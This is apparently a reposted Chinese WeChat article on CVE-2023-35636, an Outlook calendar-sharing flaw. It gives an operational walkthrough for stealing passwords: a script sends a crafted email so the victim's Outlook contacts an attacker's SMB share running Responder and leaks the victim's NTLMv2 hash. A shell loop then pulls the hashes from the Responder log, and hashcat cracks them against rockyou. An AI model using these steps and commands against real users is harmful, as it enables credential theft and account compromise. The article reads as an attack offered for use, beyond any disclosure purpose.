CVE-2023-35636 利用 Microsoft Outlook 中的日历共享功能,通过在电子邮件中添加两个标头来指示 Outlook 共享内容并联系指定计算机,从而创造拦截 NTLM v2 哈希的机会。
-
在 SMB 服务器上运行响应程序
-
发送电子邮件并等待(电子邮件收件人防火墙必须让 SMB (445) 流量通过)
用法:./cve-2023-35636.sh mx.fqdn 端口 email_sender email_recipient smb_share
./cve-2023-35636.sh mail.mydomain.com 25 [email protected] [email protected] \\xxxx\mycalendar.ics(不要忘记所有 )
注意:chmod +x cve-2023-35636.sh
需要应用程序期望
需要合法的 IP 发件人和电子邮件发件人(通过 SPF、DKIM、DMARC)
-
如果收件人用户单击小日历图标.. BOOM IP/用户(明文)和密码哈希(NTLM-v2-SSP)将发送到您的响应者 IP
-
然后你可以尝试使用 hashcat/john the ripper 破解密码
对于用户在strings Responder-Session.log | grep "NTLMv2-SSP Hash" | cut -d ":" -f 4-6 | sort -u -f | awk '{$1=$1};1'
echo "[*] 搜索: $user";
strings Responder-Session.log | grep "NTLMv2-SSP Hash" | grep -i $user | cut -d ":" -f 4-10 | head -n 1 | awk '{$1=$1};1' >> ntlm-hashes.txt
done
hashcat -a 0 -m 5600 ntlm-hashes.txt rockyou.txt -o cracked.txt -O
项目地址
https://github.com/duy-31/CVE-2023-35636
原文始发于微信公众号(TtTeam):CVE-2023-35636 Microsoft Outlook 信息泄露漏洞(泄露密码哈希)
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论